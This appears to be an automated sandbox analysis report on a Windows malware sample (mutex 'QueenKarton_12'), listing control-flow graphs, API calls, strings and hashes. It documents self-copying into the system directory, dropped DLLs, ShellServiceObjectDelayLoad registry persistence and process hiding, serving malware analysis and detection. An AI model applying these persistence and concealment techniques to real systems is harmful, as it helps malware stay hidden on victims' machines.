3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3087 4049a3 3083->3087 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3088 404cac strcat 3086->3088 3089 404cbf rand 3086->3089 3087->3084 3090 404a4b sprintf rand 3087->3090 3091 4049d9 sprintf 3087->3091 3088->3089 3092 404cd1 strcat 3089->3092 3093 404ce4 rand 3089->3093 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3087 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3087 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3087 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2774 407198 PostQuitMessage 2768->2774 2775 4077cc DefWindowProcA 2769->2775 2772 4072c9 GetWindowTextA 2770->2772 2773 4072a9 MessageBoxA SetFocus 2770->2773 2776 407041 2771->2776 2777 40705c 2771->2777 2778 407322 2772->2778 2779 407302 MessageBoxA SetFocus 2772->2779 2773->2764 2774->2764 2775->2764 2776->2769 2776->2775 2781 4071cb 2776->2781 2780 407149 2777->2780 2817 405ffa 2777->2817 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2800 407112 MoveWindow 2793->2800 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2798 407477 sprintf GetWindowTextA 2796->2798 2799 407457 MessageBoxA SetFocus 2796->2799 2797->2764 2801 4074d9 2798->2801 2802 4074b9 MessageBoxA SetFocus 2798->2802 2799->2764 2800->2780 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075c6 2804->2807 2808 4075a6 MessageBoxA SetFocus 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2809 407627 sprintf CreateFileA SetFilePointer 2807->2809 2810 4075e5 MessageBoxA SetFocus 2807->2810 2808->2764 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2822 406020 2819->2822 2820 406028 GetClassNameA 2820->2822 2821 406024 2821->2786 2822->2820 2822->2821 2823 40605f GetWindow 2822->2823 2823->2822 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2538 4079a6 2533->2538 2535 4079cf GetModuleHandleA 2534->2535 2534->2538 2539 406c29 OpenMutexA 2535->2539 2538->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2550 406d8a sprintf CopyFileA 2548->2550 2551 406d7c 2548->2551 2549->2546 2563 403ce9 rand 2550->2563 2551->2550 2552 406f65 2602 4023a7 CreateThread CloseHandle 2552->2602 2553 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 2557->2654 2672 40682b 2557->2672 2560 406fc4 TranslateMessage DispatchMessageA 2559->2560 2561 401284 exit 2559->2561 2560->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2552 2592->2553 2593 4030e5 GetModuleHandleA 2593->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2600 403059 CloseHandle 2600->2601 2601->2592 2601->2593 2601->2595 2601->2597 2601->2598 2601->2600 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2701->2702 2703 40560e 2702->2703 2703->2696 2704 401348 RegCreateKeyExA 2703->2704 2705 40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 2704->2706 2705->2706 2706->2696

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oceoll32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-1259788398
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
